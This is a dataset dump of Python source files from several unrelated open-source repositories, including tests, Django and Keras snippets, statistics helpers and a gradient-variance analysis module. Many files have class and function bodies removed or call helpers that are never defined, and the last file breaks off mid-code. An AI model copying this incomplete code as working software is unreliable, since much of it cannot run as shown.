Dataset schema (one row per source file):
hexsha | stringlengths 40-40
size | int64 5-2.06M
ext | stringclasses 11 values
lang | stringclasses 1 value
max_stars_repo_path | stringlengths 3-251
max_stars_repo_name | stringlengths 4-130
max_stars_repo_head_hexsha | stringlengths 40-78
max_stars_repo_licenses | sequencelengths 1-10
max_stars_count | int64 1-191k (nullable)
max_stars_repo_stars_event_min_datetime | stringlengths 24-24 (nullable)
max_stars_repo_stars_event_max_datetime | stringlengths 24-24 (nullable)
max_issues_repo_path | stringlengths 3-251
max_issues_repo_name | stringlengths 4-130
max_issues_repo_head_hexsha | stringlengths 40-78
max_issues_repo_licenses | sequencelengths 1-10
max_issues_count | int64 1-116k (nullable)
max_issues_repo_issues_event_min_datetime | stringlengths 24-24 (nullable)
max_issues_repo_issues_event_max_datetime | stringlengths 24-24 (nullable)
max_forks_repo_path | stringlengths 3-251
max_forks_repo_name | stringlengths 4-130
max_forks_repo_head_hexsha | stringlengths 40-78
max_forks_repo_licenses | sequencelengths 1-10
max_forks_count | int64 1-105k (nullable)
max_forks_repo_forks_event_min_datetime | stringlengths 24-24 (nullable)
max_forks_repo_forks_event_max_datetime | stringlengths 24-24 (nullable)
content | stringlengths 1-1.05M
avg_line_length | float64 1-1.02M
max_line_length | int64 3-1.04M
alphanum_fraction | float64 0-1
hexsha: 903e7c7c7eb9a7d02da0c1871291e12b6246e93e | size: 20,260 | ext: py | lang: Python | path: shoptimizer_api/optimizers_builtin/title_word_order_optimizer_test.py | repo: astivi/shoptimizer | head_hexsha: e9e415650b2b8fc07e4ae68c741e692b538e4a2c | licenses: ["Apache-2.0"] | stars: null | issues: null | forks: null
# coding=utf-8
# Copyright 2021 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for title_word_order_optimizer."""
from absl.testing import parameterized
import unittest.mock as mock
from optimizers_builtin import title_word_order_optimizer
from test_data import requests_bodies
from util import app_util
import constants
# GPC ID is 201
_PROPER_GPC_CATEGORY_EN = 'Apparel & Accessories > Jewelry > Watches'
# GPC ID is 201
_PROPER_GPC_CATEGORY_JA = (' > '
' > ')
# GPC ID is 5598
_GPC_CATEGORY_LEVEL_4_JA = (' > '
' > > '
'')
_MAX_WMM_MOVE_THRESHOLD_EN = 25
_MAX_WMM_MOVE_THRESHOLD_JA = 12
avg_line_length: 40.846774 | max_line_length: 123 | alphanum_fraction: 0.696249
hexsha: 903ed7280655c7a88f5f5eb4e9a427e26a17d12e | size: 4,035 | ext: py | lang: Python | path: contracts/models.py | repo: sivanagarajumolabanti/IPFS | head_hexsha: 9ae01ce09c97660ca312aad7d612bbc8eb8146e7 | licenses: ["MIT"] | stars: 1 (2019-08-27T04:20:06.000Z) | issues: null | forks: null
from django.contrib.auth.models import User
from django.db import models
from django.utils.timezone import now
avg_line_length: 36.351351 | max_line_length: 102 | alphanum_fraction: 0.691698
hexsha: 903f6e6ec0a321ed686c231ab9ebc657c40c7407 | size: 1,500 | ext: py | lang: Python | path: models/DenseNet.py | repo: Apollo1840/DeepECG | head_hexsha: 5132b5fc8f6b40c4b2f175cd5e56c4aec128ab3e | licenses: ["MIT"] | stars: 2 (2020-11-16T10:50:56.000Z to 2020-11-23T12:31:30.000Z) | issues: null | forks: 1 (2020-08-05T00:23:54.000Z)
from keras.models import Sequential
from keras.layers import Dense, Dropout
avg_line_length: 41.666667 | max_line_length: 100 | alphanum_fraction: 0.719333
hexsha: 9040b2be08c9dcba639583373b5f0c4c01de3091 | size: 13,242 | ext: py | lang: Python | path: openstackclient/tests/unit/volume/v3/fakes.py | repo: mydevice/python-openstackclient | head_hexsha: 4891bb38208fdcd1a2ae60e47b056841e14fbdf7 | licenses: ["Apache-2.0"] | stars: 262 (2015-01-29T20:10:49.000Z to 2022-03-23T01:59:23.000Z) | issues: 5 (2015-01-21T02:37:35.000Z to 2021-11-23T02:26:00.000Z) | forks: 194 (2015-01-08T07:39:27.000Z to 2022-03-30T13:51:23.000Z)
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import random
from unittest import mock
import uuid
from cinderclient import api_versions
from openstackclient.tests.unit.compute.v2 import fakes as compute_fakes
from openstackclient.tests.unit import fakes
from openstackclient.tests.unit.identity.v3 import fakes as identity_fakes
from openstackclient.tests.unit import utils
from openstackclient.tests.unit.volume.v2 import fakes as volume_v2_fakes
# TODO(stephenfin): Check if the responses are actually the same
FakeVolume = volume_v2_fakes.FakeVolume
FakeVolumeType = volume_v2_fakes.FakeVolumeType
avg_line_length: 33.953846 | max_line_length: 79 | alphanum_fraction: 0.614258
hexsha: 9040cb412be761146b6669d9fd4eade5a3ac0512 | size: 12,287 | ext: py | lang: Python | path: gammapy/cube/tests/test_core.py | repo: grburgess/gammapy | head_hexsha: 609e460698caca7223afeef5e71826c7b32728d1 | licenses: ["BSD-3-Clause"] | stars: 3 (2019-01-28T12:21:14.000Z to 2019-02-10T19:58:07.000Z) | issues: null | forks: null
# Licensed under a 3-clause BSD style license - see LICENSE.rst
from __future__ import absolute_import, division, print_function, unicode_literals
import numpy as np
from numpy.testing import assert_allclose
from astropy.coordinates import Angle
from astropy.tests.helper import pytest, assert_quantity_allclose
from astropy.units import Quantity
from astropy.wcs import WCS
from ...utils.testing import requires_dependency, requires_data
from ...datasets import FermiGalacticCenter
from ...image import make_header
from ...irf import EnergyDependentTablePSF
from ...spectrum.powerlaw import power_law_evaluate
from .. import SkyCube, compute_npred_cube, convolve_cube
def make_test_cubes(energies, nxpix, nypix, binsz):
"""Makes exposure and spectral cube for tests.
Parameters
----------
energies : `~astropy.units.Quantity`
Quantity 1D array of energies of cube layers
nxpix : int
Number of pixels in x-spatial direction
nypix : int
Number of pixels in y-spatial direction
binsz : float
Spatial resolution of cube, in degrees per pixel
Returns
-------
exposure_cube : `~gammapy.sky_cube.SkyCube`
Cube of uniform exposure = 1 cm^2 s
sky_cube : `~gammapy.sky_cube.SkyCube`
Cube of differential fluxes in units of cm^-2 s^-1 GeV^-1 sr^-1
"""
header = make_header(nxpix, nypix, binsz)
header['NAXIS'] = 3
header['NAXIS3'] = len(energies)
header['CDELT3'] = 1
header['CRVAL3'] = 1
header['CRPIX3'] = 1
wcs = WCS(header)
data_array = np.ones((len(energies), 10, 10))
exposure_cube = SkyCube(data=Quantity(data_array, 'cm2 s'),
wcs=wcs, energy=energies)
flux = power_law_evaluate(energies.value, 1, 2, 1)
flux = Quantity(flux, '1/(cm2 s GeV sr)')
flux_array = np.zeros_like(data_array)
for i in np.arange(len(flux)):
flux_array[i] = flux.value[i] * data_array[i]
sky_cube = SkyCube(data=Quantity(flux_array, flux.unit),
wcs=wcs, energy=energies)
return exposure_cube, sky_cube
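# Illustrative usage sketch (not part of the original test module; the energy values are
# arbitrary): the helper returns a flat exposure cube plus a power-law flux cube.
def _example_make_test_cubes():
    energies = Quantity([1, 10, 100], 'GeV')
    exposure_cube, sky_cube = make_test_cubes(energies, nxpix=10, nypix=10, binsz=0.1)
    return exposure_cube, sky_cube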
avg_line_length: 39.763754 | max_line_length: 90 | alphanum_fraction: 0.657524
hexsha: 90429ee16f26834b4fd4e1ca6831ceabda97033d | size: 298 | ext: py | lang: Python | path: api/applications/migrations/0042_merge_20201213_0228.py | repo: django-doctor/lite-api | head_hexsha: 1ba278ba22ebcbb977dd7c31dd3701151cd036bf | licenses: ["MIT"] | stars: 3 (2019-05-15T09:30:39.000Z to 2020-04-22T16:14:23.000Z) | issues: 85 (2019-04-24T10:39:35.000Z to 2022-03-21T14:52:12.000Z) | forks: 1 (2021-01-17T11:12:19.000Z)
# Generated by Django 2.2.16 on 2020-12-13 02:28
from django.db import migrations
avg_line_length: 21.285714 | max_line_length: 64 | alphanum_fraction: 0.694631
hexsha: 90459d8bfe26d007178d66a09649931906768496 | size: 5,829 | ext: py | lang: Python | path: web_app/ca_modules/make_utils.py | repo: Lockers13/codagio | head_hexsha: cfe9325cb3c207f7728db3c287439ce761ffea14 | licenses: ["MIT"] | stars: 2 (2021-01-16T13:42:14.000Z to 2021-03-03T19:36:47.000Z) | issues: null | forks: null
### A module containing various utilities used at various points throughout the processes of submitting and analyzing problems ###
import os
import json
import subprocess
import hashlib
import sys
import random
import string
from .output_processor import process_output
from . import code_templates
def make_file(path, code, problem_data):
"""Function to create script that is used for verification and profiling purposes
Returns nothing, writes to disk"""
ctemps = code_templates.get_ctemp_dict()
program_text = code
input_type = list(problem_data["metadata"]["input_type"].keys())[0]
main_function = problem_data["metadata"]["main_function"]
init_data = problem_data["init_data"]
is_init_data = problem_data["metadata"]["init_data"]
is_inputs = problem_data["metadata"]["inputs"]
with open(path, 'w') as f:
write_prequel(f)
for line in program_text:
split_line = line.split()
if len(split_line) > 0 and line.split()[0] == "def":
func_name = line.split()[1].split("(")[0]
if func_name == main_function:
fname = func_name
f.write("{0}\n".format(line))
if not line.endswith("\n"):
f.write("\n")
write_sequel(f, fname)
def gen_sample_outputs(filename, problem_data, init_data=None, input_type="default"):
"""Utility function invoked whenever a reference problem is submitted
Returns a list of outputs that are subsequently stored in DB as field associated with given problem"""
inputs = problem_data["inputs"]
platform = sys.platform.lower()
SAMPUP_TIMEOUT = "8"
SAMPUP_MEMOUT = "1000"
timeout_cmd = "gtimeout {0}".format(SAMPUP_TIMEOUT) if platform == "darwin" else "timeout {0} -m {1}".format(SAMPUP_TIMEOUT, SAMPUP_MEMOUT) if platform == "linux" or platform == "linux2" else ""
base_cmd = "{0} python".format(timeout_cmd)
outputs = []
if input_type == "default":
programmatic_inputs = inputs
if inputs is not None:
for inp in programmatic_inputs:
input_arg = json.dumps(inp)
output = process_output(base_cmd, filename, input_arg=input_arg, init_data=init_data)
### uncomment below line for debugging
# print("CSO =>", cleaned_split_output)
outputs.append(output)
else:
output = process_output(base_cmd, filename, init_data=init_data)
### uncomment below line for debugging
# print("CSO =>", cleaned_split_output)
outputs.append(output)
elif input_type == "file":
for script in inputs:
output = process_output(base_cmd, filename, input_arg=script, init_data=init_data)
### uncomment below line for debugging
# print("CSO =>", cleaned_split_output)
outputs.append(output)
try:
os.remove(script)
except:
pass
return outputs
def generate_input(input_type, input_length, num_tests):
"""Self-explanatory utility function that generates test input for a submitted reference problem based on metadata specifications
Returns jsonified list of inputs"""
global_inputs = []
for i in range(num_tests):
if input_type == "integer":
inp_list = [random.randint(1, 1000) for x in range(input_length)]
elif input_type == "float":
inp_list = [round(random.uniform(0.0, 1000.0), 2) for x in range(input_length)]
elif input_type == "string":
inp_list = [random_string(random.randint(1, 10)) for x in range(input_length)]
global_inputs.append(inp_list)
    return global_inputs
avg_line_length: 40.2 | max_line_length: 198 | alphanum_fraction: 0.632699
hexsha: 904821f621f97dceeec43eb063d81e21fa90c37c | size: 21,136 | ext: py | lang: Python | path: wazimap/data/utils.py | stars repo: AssembleOnline/wazimap @ 1b8b68fb231b768047eee1b20ed180e4820a2890 | issues/forks repo: Bhanditz/wazimap @ fde22a0874020cf0ae013aeec7ab55b7c5a70b27 | licenses: ["MIT"] | stars: 1 (2019-01-14T15:37:03.000Z) | issues: null | forks: null
from __future__ import division
from collections import OrderedDict
from sqlalchemy import create_engine, MetaData, func
from sqlalchemy.orm import sessionmaker, class_mapper
from django.conf import settings
from django.db.backends.base.creation import TEST_DATABASE_PREFIX
from django.db import connection
if settings.TESTING:
# Hack to ensure the sqlalchemy database name matches the Django one
# during testing
url = settings.DATABASE_URL
parts = url.split("/")
# use the test database name
db_name = connection.settings_dict.get('TEST', {}).get('NAME')
if db_name is None:
db_name = TEST_DATABASE_PREFIX + parts[-1]
parts[-1] = db_name
url = '/'.join(parts)
_engine = create_engine(url)
else:
_engine = create_engine(settings.DATABASE_URL)
# See http://docs.sqlalchemy.org/en/latest/core/constraints.html#constraint-naming-conventions
naming_convention = {
"ix": 'ix_%(column_0_label)s',
"uq": "uq_%(table_name)s_%(column_0_name)s",
"ck": "ck_%(table_name)s_%(constraint_name)s",
"fk": "fk_%(table_name)s_%(column_0_name)s_%(referred_table_name)s",
"pk": "pk_%(table_name)s"
}
_metadata = MetaData(bind=_engine, naming_convention=naming_convention)
_Session = sessionmaker(bind=_engine)
def capitalize(s):
"""
Capitalize the first char of a string, without
affecting the rest of the string.
This differs from `str.capitalize` since the latter
also lowercases the rest of the string.
"""
if not s:
return s
return ''.join([s[0].upper(), s[1:]])
def percent(num, denom, places=2):
if denom == 0:
return 0
else:
return round(num / denom * 100, places)
def ratio(num, denom, places=2):
if denom == 0:
return 0
else:
return round(num / denom, places)
def add_metadata(data, table):
if 'metadata' not in data:
data['metadata'] = {}
# this might be a SQLAlchemy model that is linked back to
# a data table
if hasattr(table, 'data_tables'):
table = table.data_tables[0]
data['metadata']['table_id'] = table.id
if table.universe:
data['metadata']['universe'] = table.universe
if table.year:
data['metadata']['year'] = table.year
# dictionaries that merge_dicts will merge
MERGE_KEYS = set(['values', 'numerators', 'error'])
def calculate_median(objects, field_name):
'''
Calculates the median where obj.total is the distribution count and
getattr(obj, field_name) is the distribution segment.
Note: this function assumes the objects are sorted.
'''
total = 0
for obj in objects:
total += obj.total
half = total / 2.0
counter = 0
for i, obj in enumerate(objects):
counter += obj.total
if counter > half:
if counter - half == 1:
# total must be even (otherwise counter - half ends with .5)
return (float(getattr(objects[i - 1], field_name)) +
float(getattr(obj, field_name))) / 2.0
return float(getattr(obj, field_name))
elif counter == half:
# total must be even (otherwise half ends with .5)
return (float(getattr(obj, field_name)) +
float(getattr(objects[i + 1], field_name))) / 2.0
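# Worked example (illustrative helper, not in the original module): rows carry a ``total``
# count plus the field being summarised. With 8 observations the running count hits exactly
# half at the second row, so the median is the midpoint of the 20 and 30 buckets.
def _example_calculate_median():
    from collections import namedtuple
    Row = namedtuple('Row', ['age', 'total'])
    rows = [Row(age=10, total=2), Row(age=20, total=2), Row(age=30, total=4)]
    return calculate_median(rows, 'age')  # returns 25.0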
def calculate_median_stat(stats):
'''
Calculates the stat (key) that lies at the median for stat data from the
output of get_stat_data.
Note: this function assumes the objects are sorted.
'''
total = 0
keys = [k for k in stats.iterkeys() if k != 'metadata']
total = sum(stats[k]['numerators']['this'] for k in keys)
half = total / 2.0
counter = 0
for key in keys:
counter += stats[key]['numerators']['this']
if counter >= half:
return key
def merge_dicts(this, other, other_key):
'''
Recursively merges 'other' dict into 'this' dict. In particular
it merges the leaf nodes specified in MERGE_KEYS.
'''
for key, values in this.iteritems():
if key in MERGE_KEYS:
if key in other:
values[other_key] = other[key]['this']
elif isinstance(values, dict):
merge_dicts(values, other[key], other_key)
def group_remainder(data, num_items=4, make_percentage=True,
remainder_name="Other"):
'''
This function assumes data is an OrderedDict instance. It iterates
over the dict items, grouping items with index >= num_items - 1 together
under key remainder_name. If make_percentage = True, the 'values' dict
contains percentages and the 'numerators' dict the totals. Otherwise
'values' contains the totals.
'''
num_key = 'numerators' if make_percentage else 'values'
total_all = dict((k, 0.0) for k in data.values()[0][num_key].keys())
total_other = total_all.copy()
other_dict = {
"name": remainder_name,
"error": {"this": 0.0},
"numerator_errors": {"this": 0.0},
num_key: total_other,
}
cutoff = num_items - 2
for i, (key, values) in enumerate(data.items()):
if key == 'metadata':
continue
for k, v in values[num_key].iteritems():
total_all[k] += v
if i > cutoff:
del data[key]
data.setdefault(remainder_name, other_dict)
for k, v in values[num_key].iteritems():
total_other[k] += v
if make_percentage:
for key, values in data.iteritems():
if key != 'metadata':
values['values'] = dict((k, percent(v, total_all[k]))
for k, v in values['numerators'].iteritems())
def get_objects_by_geo(db_model, geo, session, fields=None, order_by=None,
only=None, exclude=None, data_table=None):
""" Get rows of statistics from the stats mode +db_model+ for a particular
geography, summing over the 'total' field and grouping by +fields+. Filters
to include +only+ and ignore +exclude+, if given.
"""
data_table = data_table or db_model.data_tables[0]
if fields is None:
fields = [c.key for c in class_mapper(db_model).attrs if c.key not in ['geo_code', 'geo_level', 'geo_version', 'total']]
fields = [getattr(db_model, f) for f in fields]
objects = session\
.query(func.sum(db_model.total).label('total'), *fields)\
.group_by(*fields)\
.filter(db_model.geo_code == geo.geo_code)\
.filter(db_model.geo_level == geo.geo_level)\
.filter(db_model.geo_version == geo.version)
if only:
for k, v in only.iteritems():
objects = objects.filter(getattr(db_model, k).in_(v))
if exclude:
for k, v in exclude.iteritems():
objects = objects.filter(getattr(db_model, k).notin_(v))
if order_by is not None:
attr = order_by
is_desc = False
if order_by[0] == '-':
is_desc = True
attr = attr[1:]
if attr == 'total':
if is_desc:
attr = attr + ' DESC'
else:
attr = getattr(db_model, attr)
if is_desc:
attr = attr.desc()
objects = objects.order_by(attr)
objects = objects.all()
if len(objects) == 0:
raise LocationNotFound("%s for geography %s version '%s' not found"
% (db_model.__table__.name, geo.geoid, geo.version))
return objects
def get_stat_data(fields, geo, session, order_by=None,
percent=True, total=None, table_fields=None,
table_name=None, only=None, exclude=None, exclude_zero=False,
recode=None, key_order=None, table_dataset=None,
percent_grouping=None, slices=None):
"""
This is our primary helper routine for building a dictionary suitable for
a place's profile page, based on a statistic.
It sums over the data for ``fields`` in the database for the place identified by
``geo`` and calculates numerators and values. If multiple fields are given,
it creates nested result dictionaries.
Control the rows that are included or ignored using ``only``, ``exclude`` and ``exclude_zero``.
The field values can be recoded using ``recode`` and and re-ordered using ``key_order``.
:param fields: the census field to build stats for. Specify a list of fields to build
nested statistics. If multiple fields are specified, then the values
of parameters such as ``only``, ``exclude`` and ``recode`` will change.
These must be fields in `api.models.census.census_fields`, e.g. 'highest educational level'
:type fields: str or list
:param geo: the geograhy object
:param dbsession session: sqlalchemy session
:param str order_by: field to order by, or None for default, eg. '-total'
:param bool percent: should we calculate percentages, or just sum raw values?
:param list percent_grouping: when calculating percentages, which fields should rows be grouped by?
Default: none of them -- calculate each entry as a percentage of the
whole dataset. Ignored unless ``percent`` is ``True``.
:param list table_fields: list of fields to use to find the table, defaults to `fields`
:param int total: the total value to use for percentages, or None to total columns automatically
:param str table_name: override the table name, otherwise it's calculated from the fields and geo_level
:param list only: only include these field values. If ``fields`` has many items, this must be a dict
mapping field names to a list of strings.
:type only: dict or list
:param exclude: ignore these field values. If ``fields`` has many items, this must be a dict
mapping field names to a list of strings. Field names are checked
before any recoding.
:type exclude: dict or list
:param bool exclude_zero: ignore fields that have a zero or null total
:param recode: function or dict to recode values of ``key_field``. If ``fields`` is a singleton,
then the keys of this dict must be the values to recode from, otherwise
they must be the field names and then the values. If this is a lambda,
it is called with the field name and its value as arguments.
:type recode: dict or lambda
:param key_order: ordering for keys in result dictionary. If ``fields`` has many items,
this must be a dict from field names to orderings.
The default ordering is determined by ``order``.
:type key_order: dict or list
:param str table_dataset: dataset used to help find the table if ``table_name`` isn't given.
:param list slices: return only a slice of the final data, by choosing a single value for each
field in the field list, as specified in the slice list.
:return: (data-dictionary, total)
"""
from .tables import FieldTable
if not isinstance(fields, list):
fields = [fields]
n_fields = len(fields)
many_fields = n_fields > 1
if order_by is None:
order_by = fields[0]
if only is not None:
if not isinstance(only, dict):
if many_fields:
raise ValueError("If many fields are given, then only must be a dict. I got %s instead" % only)
else:
only = {fields[0]: set(only)}
if exclude is not None:
if not isinstance(exclude, dict):
if many_fields:
raise ValueError("If many fields are given, then exclude must be a dict. I got %s instead" % exclude)
else:
exclude = {fields[0]: set(exclude)}
if key_order:
if not isinstance(key_order, dict):
if many_fields:
raise ValueError("If many fields are given, then key_order must be a dict. I got %s instead" % key_order)
else:
key_order = {fields[0]: key_order}
else:
key_order = {}
if recode:
if not isinstance(recode, dict) or not many_fields:
recode = dict((f, recode) for f in fields)
table_fields = table_fields or fields
# get the table and the model
if table_name:
data_table = FieldTable.get(table_name)
else:
data_table = FieldTable.for_fields(table_fields, table_dataset)
if not data_table:
ValueError("Couldn't find a table that covers these fields: %s" % table_fields)
objects = get_objects_by_geo(data_table.model, geo, session, fields=fields, order_by=order_by,
only=only, exclude=exclude, data_table=data_table)
if total is not None and many_fields:
raise ValueError("Cannot specify a total if many fields are given")
if total and percent_grouping:
raise ValueError("Cannot specify a total if percent_grouping is given")
if total is None and percent and data_table.total_column is None:
# The table doesn't support calculating percentages, but the caller
# has asked for a percentage without providing a total value to use.
# Either specify a total, or specify percent=False
raise ValueError("Asking for a percent on table %s that doesn't support totals and no total parameter specified." % data_table.id)
# sanity check the percent grouping
if percent:
if percent_grouping:
for field in percent_grouping:
if field not in fields:
raise ValueError("Field '%s' specified in percent_grouping must be in the fields list." % field)
# re-order percent grouping to be same order as in the field list
percent_grouping = [f for f in fields if f in percent_grouping]
else:
percent_grouping = None
denominator_key = getattr(data_table, 'denominator_key')
root_data = OrderedDict()
running_total = 0
group_totals = {}
grand_total = -1
def get_data_object(obj):
""" Recurse down the list of fields and return the
final resting place for data for this stat. """
data = root_data
for i, field in enumerate(fields):
key = getattr(obj, field)
if recode and field in recode:
key = get_recoded_key(recode, field, key)
else:
key = capitalize(key)
# enforce key ordering the first time we see this field
if (not data or data.keys() == ['metadata']) and field in key_order:
for fld in key_order[field]:
data[fld] = OrderedDict()
# ensure it's there
if key not in data:
data[key] = OrderedDict()
data = data[key]
# default values for intermediate fields
if data is not None and i < n_fields - 1:
data['metadata'] = {'name': key}
# data is now the dict where the end value is going to go
if not data:
data['name'] = key
data['numerators'] = {'this': 0.0}
return data
# run the stats for the objects
for obj in objects:
if not obj.total and exclude_zero:
continue
if denominator_key and getattr(obj, data_table.fields[-1]) == denominator_key:
grand_total = obj.total
# don't include the denominator key in the output
continue
# get the data dict where these values must go
data = get_data_object(obj)
if not data:
continue
if obj.total is not None:
data['numerators']['this'] += obj.total
running_total += obj.total
else:
# TODO: sanity check this is the right thing to do for multiple fields with
# nested nulls -- does aggregating over nulls treat them as zero, or should we
# treat them as null?
data['numerators']['this'] = None
if percent_grouping:
if obj.total is not None:
group_key = tuple()
for field in percent_grouping:
key = getattr(obj, field)
if recode and field in recode:
# Group by recoded keys
key = get_recoded_key(recode, field, key)
group_key = group_key + (key,)
data['_group_key'] = group_key
group_totals[group_key] = group_totals.get(group_key, 0) + obj.total
if grand_total == -1:
grand_total = running_total if total is None else total
# add in percentages
calc_percent(root_data)
if slices:
for v in slices:
root_data = root_data[v]
add_metadata(root_data, data_table)
return root_data, grand_total
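# Illustrative sketch (the field name is hypothetical, not part of this module): a typical
# profile-page call sums a single field for one geography and returns percentage values
# together with the grand total.
def _example_profile_stat(geo, session):
    data, total = get_stat_data(['gender'], geo, session, order_by='-total')
    return data, total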
avg_line_length: 36.758261 | max_line_length: 138 | alphanum_fraction: 0.607116
hexsha: 9048acfcee11de068839ac11bcc199658e3bb1fe | size: 9,913 | ext: py | lang: Python | path: ovis/analysis/gradients.py | repo: vlievin/ovis | head_hexsha: 71f05a5f5219b2df66a9cdbd5a5339e0e179597b | licenses: ["MIT"] | stars: 10 (2020-08-06T22:25:11.000Z to 2022-03-07T13:10:15.000Z) | issues: 2 (2021-06-08T22:15:24.000Z to 2022-03-12T00:45:59.000Z) | forks: null
from time import time
from typing import *
import torch
from booster import Diagnostic
from torch import Tensor
from tqdm import tqdm
from .utils import cosine, percentile, RunningMean, RunningVariance
from ..estimators import GradientEstimator
from ..models import TemplateModel
def get_grads_from_tensor(model: TemplateModel, loss: Tensor, output: Dict[str, Tensor], tensor_id: str, mc: int, iw: int):
"""
Compute the gradients given a `tensor` on which was called `tensor.retain_graph()`
Assumes `tensor` to have `tensor.shape[0] == bs * iw * mc`
:param model: VAE model
:param loss: loss value
:param output: model's output: dict
:param tensor_id: key of the tensor in the model output
:param mc: number of outer Monte-Carlo samples
:param iw: number of inner Importance-Weighted samples
:return: gradient: Tensor of shape [D,] where D is the number of elements in `tensor`
"""
assert tensor_id in output.keys(), f"Tensor_id = `{tensor_id}` not in model's output"
model.zero_grad()
loss.sum().backward(create_graph=True, retain_graph=True)
# get the tensor of interest
tensors = output[tensor_id] if isinstance(output[tensor_id], list) else output[tensor_id]
bs = tensors[0].shape[0] // (mc * iw)
# get the gradients, flatten and concat across the feature dimension
gradients = [p.grad for p in tensors]
assert not any(
[g is None for g in gradients]), f"{sum([int(g is None) for g in gradients])} tensors have no gradients. " \
f"Use `tensor.retain_graph()` in your model to enable gradients. " \
f"tensor_id = `{tensor_id}`"
# compute gradients estimate for each individual grads
# sum individual gradients because x_expanded = x.expand(bs, mc, iw)
gradients = torch.cat([g.view(bs, mc * iw, -1).sum(1) for g in gradients], 1)
# return an MC average of the grads
return gradients.mean(0)
def get_grads_from_parameters(model: TemplateModel, loss: Tensor, key_filter: str = ''):
"""
Return the gradients for the parameters matching the `key_filter`
:param model: VAE model
:param loss: loss value
:param key_filter: filter value (comma separated values accepted (e.g. "A,b"))
:return: Tensor of shape [D,] where `D` is the number of parameters
"""
key_filters = key_filter.split(',')
params = [p for k, p in model.named_parameters() if any([(_key in k) for _key in key_filters])]
assert len(params) > 0, f"No parameters matching filter = `{key_filters}`"
model.zero_grad()
# backward individual gradients \nabla L[i]
loss.mean().backward(create_graph=True, retain_graph=True)
# gather gradients for each parameter and concat such that each element across the dim 1 is a parameter
grads = [p.grad.view(-1) for p in params if p.grad is not None]
return torch.cat(grads, 0)
def get_gradients_statistics(estimator: GradientEstimator,
model: TemplateModel,
x: Tensor,
mc_samples: int = 100,
key_filter: str = 'inference_network',
oracle_grad: Optional[Tensor] = None,
return_grads: bool = False,
compute_dsnr: bool = True,
samples_per_batch: Optional[int] = None,
eps: float = 1e-15,
tqdm: Callable = tqdm,
**config: Dict) -> Tuple[Diagnostic, Dict]:
"""
Compute the gradients and return the statistics (Variance, Magnitude, SNR, DSNR)
If an `oracle` gradient is available: compute the cosine similarity with the oracle and the gradient estimate (direction)
    The Magnitude, Variance and SNR are defined parameter-wise. All return values are averaged over the D parameters with
    Variance > eps. For instance, the returned SNR is
    * SNR = 1/D \sum_d SNR_d
    Each MC sample is computed sequentially and the mini-batch `x` will be split into chunks
    if a value `samples_per_batch` is specified and if `samples_per_batch < x.size(0) * mc * iw`.
:param estimator: Gradient Estimator
:param model: VAE model
:param x: mini-batch of observations
:param mc_samples: number of Monte-Carlo samples
:param key_filter: key matching parameters names in the model
:param oracle_grad: true direction of the gradients [Optional]
:param return_grads: return all gradients in the `meta` output directory if set to `True`
:param compute_dsnr: compute the Directional SNR if set to `True`
:param samples_per_batch: max. number of individual samples `bs * mc * iw` per mini-batch [Optional]
:param eps: minimum Variance value used for filtering
:param config: config dictionary for the estimator
:param tqdm: custom `tqdm` function
:return: output : Diagnostic = {'grads' : {'variance': ..,
'magnitude': ..,
'snr': ..,
'dsnr' ..,
'direction': cosine similarity with the oracle,
'keep_ratio' : ratio of parameter-wise gradients > epsilon}}
'snr': {'percentiles', 'mean', 'min', 'max'}
},
meta : additional data including the gradients values if `return_grads`
"""
_start = time()
grads_dsnr = None
grads_mean = RunningMean()
grads_variance = RunningVariance()
if oracle_grad is not None:
grads_dir = RunningMean()
all_grads = None
# compute each MC sample sequentially
for i in tqdm(range(mc_samples), desc="Gradients Analysis"):
# compute number of chuncks based on the capacity `samples_per_batch`
if samples_per_batch is None:
chuncks = 1
else:
bs = x.size(0)
mc = estimator.config['mc']
iw = estimator.config['iw']
# infer number of chunks
total_samples = bs * mc * iw
chuncks = max(1, -(-total_samples // samples_per_batch)) # ceiling division
# compute mini-batch gradient by chunck if `x` is large
gradients = RunningMean()
for k, x_ in enumerate(x.chunk(chuncks, dim=0)):
model.eval()
model.zero_grad()
# forward, backward to compute the gradients
loss, diagnostics, output = estimator(model, x_, backward=False, **config)
# gather mini-batch gradients
if 'tensor:' in key_filter:
tensor_id = key_filter.replace("tensor:", "")
gradients_ = get_grads_from_tensor(model, loss, output, tensor_id, estimator.mc, estimator.iw)
else:
gradients_ = get_grads_from_parameters(model, loss, key_filter=key_filter)
# move to cpu
gradients_ = gradients_.detach().cpu()
# update average
gradients.update(gradients_, k=x_.size(0))
# gather statistics
with torch.no_grad():
gradients = gradients()
if return_grads or compute_dsnr:
all_grads = gradients[None] if all_grads is None else torch.cat([all_grads, gradients[None]], 0)
grads_mean.update(gradients)
grads_variance.update(gradients)
# compute the statistics
with torch.no_grad():
# compute statistics for each data point `x_i`
grads_variance = grads_variance()
grads_mean = grads_mean()
# compute signal-to-noise ratio. see `tighter variational bounds are not necessarily better` (eq. 4)
grad_var_sqrt = grads_variance.pow(0.5)
clipped_variance_sqrt = grad_var_sqrt.clamp(min=eps)
grads_snr = grads_mean.abs() / (clipped_variance_sqrt)
# compute DSNR, see `tighter variational bounds are not necessarily better` (eq. 12)
if compute_dsnr:
u = all_grads.mean(0, keepdim=True)
u /= u.norm(dim=1, keepdim=True, p=2)
g_parallel = u * (u * all_grads).sum(1, keepdim=True)
g_perpendicular = all_grads - g_parallel
grads_dsnr = g_parallel.norm(dim=1, p=2) / (eps + g_perpendicular.norm(dim=1, p=2))
# compute grad direction: cosine similarity between the gradient estimate and the oracle
if oracle_grad is not None:
grads_dir = cosine(grads_mean, oracle_grad, dim=-1)
# reinitialize grads
model.zero_grad()
# reduce fn: keep only parameter with variance > 0
mask = (grads_variance > eps).float()
_reduce = lambda x: (x * mask).sum() / mask.sum()
output = Diagnostic({'grads': {
'variance': _reduce(grads_variance),
